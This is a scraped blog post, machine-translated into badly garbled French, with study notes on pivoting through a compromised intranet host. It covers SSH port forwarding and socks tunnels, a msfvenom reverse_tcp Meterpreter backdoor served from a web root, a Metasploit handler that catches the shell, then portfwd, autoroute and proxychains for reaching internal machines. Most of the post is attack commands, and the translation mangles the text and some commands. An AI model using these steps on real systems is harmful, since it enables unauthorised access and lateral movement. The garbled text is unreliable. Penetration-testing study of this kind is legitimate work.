当前位置:网站首页>Connaissance de la technologie des tunnels d'infiltration Intranet
Connaissance de la technologie des tunnels d'infiltration Intranet
2022-07-20 09:46:00 【Mauro... K】
Catalogue des articles
Préface
L'ancien cours de la Lune noire auto - étude de la compilation de notes.
Un.、Tunnel commun de l'intranet
Tunnel d'application:SSHTunnel、HTTPTunnel、HTTPSTunnel、DNSTunnel
Tunnel de transmission:TCPTunnel、UDPTunnel
Tunnel au niveau du réseau :ICMPTunnel、IPV6Tunnel、GRETunnel
2.、SSHTunnel
1.Qu'est - ce queSSHTunnel
SSH Le tunnel est SSHTransfert de port,InSSHClients etSSH Construire un tunnel entre les serveurs , Transmettre les données du réseau via ce tunnel au port spécifié , Pour la communication réseau .SSH Tunnel fournit automatiquement les services de cryptage et de décryptage correspondants , La sécurité de la transmission des données est garantie .
2.SSHTrois modes de transmission du tunnel
1)SSHLe tunnel a trois modes de transfert de port
Transfert de port local( C'est - à - dire une connexion positive )、Transfert de port distant( C'est une connexion inversée ) Et Dynamic port Forwarding (C'estsocksAgents). Voici quelques descriptions communes des paramètres :
| Paramètres communs | Description |
|---|---|
| -f | Exécution de fondsshDirectives |
| -C | Demande toutes les transmissions de compression de données ,Augmenter la vitesse de transmission |
| -q | Mode silencieux. Éliminer tous les avertissements et diagnostics , Même s'il y a une erreur, il n'y a aucun indice |
| -f | Redirectionstdin À /dev/null |
| -l | Spécifiez le nom d'utilisateur,C'[email protected] Celui qui est écrit |
| -n | Redirectionstdin À /dev/null Cette option doit être utilisée en arrière - plan |
| -N | Établir une connexion silencieuse(Connexion établie, Mais je ne vois pas de session spécifique ) |
| -g | Autoriser les hôtes externes à se connecter au port de transfert local |
| -L | Indique la transmission du port local |
| -R | Transfert de port distant |
| -P | DésignationsshPort |
| -D | Spécifiez une machine locale, Transfert dynamique des ports d'application (socksAgents) |
| -T | Interdire l'attribution de faux terminaux,- Oui.sshOutelnet Attendez de vous connecter au système , Les terminaux que le système nous assigne sont des pseudo - terminaux . Impossible d'obtenir le terminal Si désactivé , Mais il est encore possible d'obtenir shell, Mais il n'y a pas beaucoup de variables d'environnement attendues , Par exemple, une invite de commande ,PS1Attendez. |
2)SSHTransfert de port local(Connexion avant):
Configuration du scénario: Si nous contrôlons déjà l'ordinateur central 1 C'est - à - direwebServeur, Je veux accéder à l'hôte maintenant 2 Serveur de données pour ,Mais l'hôte1 Et l'hôte2 Non. ,Alors construisezSSHTunnel.
Description simple de la topologie du réseau :
Solutions:UtilisationSSH Connexion directe du tunnel ,Mettre l'hôte2De80Port mapped to host1De8888Port,Et laissez - nouskali Accès au serveur de données .
Sur l'hôte1C'est - à - direweb Commandes exécutées sur le serveur :
# Syntaxe
ssh –CNfg -L Écouterip:Port d'écoute:Hôte distantip: Port hôte distant Nom d'[email protected] port
ssh –CNfg -L 0.0.0.0:8888:10.10.10.11:80 [email protected]
kaliAccès àhttp://192.168.8.251:8888 Accès réussi à l'hôte 2 Serveur de données pour
Avant3389Port,À modifiersshProfil du serveur
/etc/ssh/sshd_config
– PermitRootLogin yes
– Port 22
– PasswordAuthentication yes
service ssh restart
# Inweb Transmission effectuée sur le serveur 3389Commandes de port
webLe serveur écouteip:webPorts surveillés par le serveur: Du serveur de données ip: Port du serveur de données webServeursshNom d'utilisateur
@webServeurip Port
ssh -CNfg -L 0.0.0.0:13389:10.10.10.11:3389 [email protected] -p 22
Et puiswebUtilisé sur le serveurrdesktopConnexion
rdesktop 127.0.0.1 13389
3)Transfert de port distant(Connexion inversée):
Configuration du scénario: Si nous contrôlons déjà l'ordinateur central 1 C'est - à - direwebServeur, Je veux accéder à l'hôte maintenant 2 Serveur de données pour ,Mais l'hôte1 Et l'hôte2 Non. ,Alors construisezSSHTunnel.
Description simple de la topologie du réseau :
Solutions:UtilisationSSH Connexion inversée du tunnel ,Oui.web Le serveur lui - même 22Port Map tokaliDe2222Sur le port,Et laissez - nouskali Accès au serveur de données .
Inweb Commandes exécutées sur le serveur
# Syntaxe
ssh -qTfnN -R kaliPort sur:webServeurip:webServeurport kaliOui.sshUtilisateurs @ kaliDeip
# Entrée requisekaliDeSSHMot de passe pour
ssh -qTfnN -R 2222:127.0.0.1:22 [email protected]
kaliCommandes exécutées sur
# Entrée requisewebServeurSSHMot de passe
ssh -p 2222 [email protected]
# Avant3389Port
ssh -CNfg -R 13389:10.10.10.10:3389 [email protected]
kaliCommandes exécutées sur
rdesktop 127.0.0.1 13389
4)Transfert de port dynamique(socksAgents)
Le scénario est le suivant ,Cette fois.socksMode de représentation,Attention!:sshSoutien uniquementsocks4Etsocks5 Deux types d'agents .
Inweb Commandes exécutées sur le serveur
# -D Le principe de fonctionnement du paramètre est qu'un socket Écouter port Port, Une fois connecté à ce port,
# La connexion est transmise par un canal sécurisé, Selon le Protocole de l'application, vous pouvez déterminer où l'hôte distant se connectera
# Syntaxe
ssh -qTfnN -D port remotehost
# Description correspondante kaliDesshNom d'utilisateur kaliDeip
ssh -qTfnN -D 25001 [email protected]
kali Agent sur lequel configurer le navigateur
Dernière visitehttp://192.168.8.251:25001C'est tout..
Trois、MSFMéthode de cartographie des ports
1.Prends - le d'abord.shell
1)UtilisermsfGénérer une porte arrière.
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.8.250 lport=25002 -f exe >/var/www/html/shell.exe
2)kaliSurveiller le port correspondant,Prends ça.shell.
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.8.250
set lport 25002
run
2.Cartographie des ports
1) Les scénarios sont présentés ci - dessus , Coller une topologie simple ,Bonne compréhension.
2)InmeterpreterExécuter le port de cartographie de commande dans,Connexion avant.Visite aprèskaliLocal25003Le port est juste.
Je l'ai.shellHôte de1Utilisation moyennemsfExécuter la commande suivante
portfwd add -L 192.168.8.250 -l 25003 -p 80 -r 10.10.10.11
| Paramètres | Description |
|---|---|
| -L | Hôte local à écouter |
| -l | Port local à écouter |
| -p | Port distant connecté à |
| -r | Hôte distant à connecter |
3.Transfert de port
1)Je l'ai.shellHôte de1Utilisation moyennemsfExécuter la commande suivante.
Mettre l'hôte1De3389Port transmis àkaliDe25003Port
portfwd add -l 25003 -p 3389 -r 192.168.8.251
kaliCommandes exécutées sur
rdesktop 127.1.1.0:25003 # Connectez - vous avec succès 3389,Le mot de passe du compte est requis
2)portfwdAutres commandes pour.
| Les ordres | Description |
|---|---|
| portfwd list | Voir la Liste |
| portfwd flush | Vider la liste |
Quatre、MSFScan à travers les routes
1.Ajouter un itinéraire et voir
run autoroute -s 192.168.52.0/24 # Ajouter une route d'enregistrement
run autoroute -p #Voir le routage
route print #Voir le routage
2.Ajouter un agent
Paramètres socks Agents,Attention!Socks Le support proxy a été intégré dans un seul module auxiliaire ,La version par défaut est5Peut être utilisétcpEtudp Comment définir le mot de passe du compte , Version commutable .
background
use auxiliary/server/socks_proxy
set version 4a
set srvhost 192.168.231.133 #kaliDeip Vous pouvez aussi changer la valeur par défaut sans
set srvport 25002
run
3.Modifier le profil
Enlevez # Ouvre. dynamic_chain, Ajouter un agent en bas ipEt les ports, Vous pouvez utiliser la valeur par défaut sans changer .Si vous rencontrezproxychains.conf Cas où le fichier est vide ,Maisproxychains4.conf Copier le contenu du fichier dans ,Ou directementproxychains.conf Suppression de fichiers,Prends ça.proxychains4.conf Le nom du fichier estproxychains.conf.proxychainsNe pas activerDNSAgents,- Oui.proxy_dnsAvec#Note,Sinonnmap Une erreur est signalée lors de la numérisation .
vim /etc/proxychains.conf
4.Testez
Tester l'accès à l'intranet ip, Accès réussi trouvé ,Configuration réussie.
proxychains curl http://192.168.52.143
边栏推荐
- 基于定时器捕获功能的红外解码程序(NEC协议)
- 测评瑞萨RZ/G2L存储读写速度与网络
- Qualcomm snpe
- Mindspore dependent library not found
- 三极管串联线性稳压电路原理详解及Multisim仿真
- Error in concat operator splicing tuples containing multiple tensors
- [mindspire] run Bert base Pretrain for GPU, adamweightdelay optimizer performance is not up to it
- 【HAL库】串口通信
- Smpl model
- [mindspire] [mindir] how does mindspire conduct mindir reasoning
猜你喜欢
瑞萨G2L核心板及开发板上手评测
Win10系统安装ISE14.7后出现软件闪退及驱动不能正常安装问题
Xilinx FPGA key resource evaluation
基于定时器捕获功能的红外解码程序(NEC协议)
如何把一个“平台” 塞进一个小盒子里?(下)|技术实现篇
When the vivado project version is upgraded, the relevant IP version IP status displays using cached IP results
RAC deployment of centos7x Oracle 11g (no graphical installation)
ViT结构
![[mindspore] [Lite end-to-side training reasoning] mindspore lit runs the lenet training example code according to the instructions and reports an error](/img/8c/db78bb0bcb75b7457c5e5f5c6cfd2a.jpg)
[mindspore] [Lite end-to-side training reasoning] mindspore lit runs the lenet training example code according to the instructions and reports an error
Vivado2018.2 version with PS side configuration (BD) when calling Modelsim simulation: (vlog-13006) could not find the package (sc_util_v1_0_3_pkg)
随机推荐
UltraEdit自动换行/制表符设置
Xilinx 7 Series primitive use (clock related) - (I)
Samba的搭建
The paper interprets beyond self attention: external attention using two linear layers for visual tasks
cadence 17.2 版本的 OrCAD Capture CIS打开时不停地弹出空白网页解决办法
全志A40i网卡软件问题怎么办
ARM中断优先级之理解
The difference between bitwise negation and logical negation in Verilog language
基于瑞芯微3568核心板实现的智能网关
Sparse Instance Activation for Real-Time Instance Segmentation
RTOS——RT-Thread Studio
Allegro (cadence)导出gerber文件步骤
Xilinx FPGA关键资源评估
基于linux操作系统安装oracle 11g及建库(centos7x无图形)
个人博客网站文章添加目录导航
用LS1028A开发板输出PWM方波
Reset in Xilinx
如何把一个“平台” 塞进一个小盒子里?(下)|技术实现篇
FPGA刷题P3: 4位数值比较器电路、4bit超前进位加法器电路、优先编码器电路、 优先编码器
Analysis of common activation functions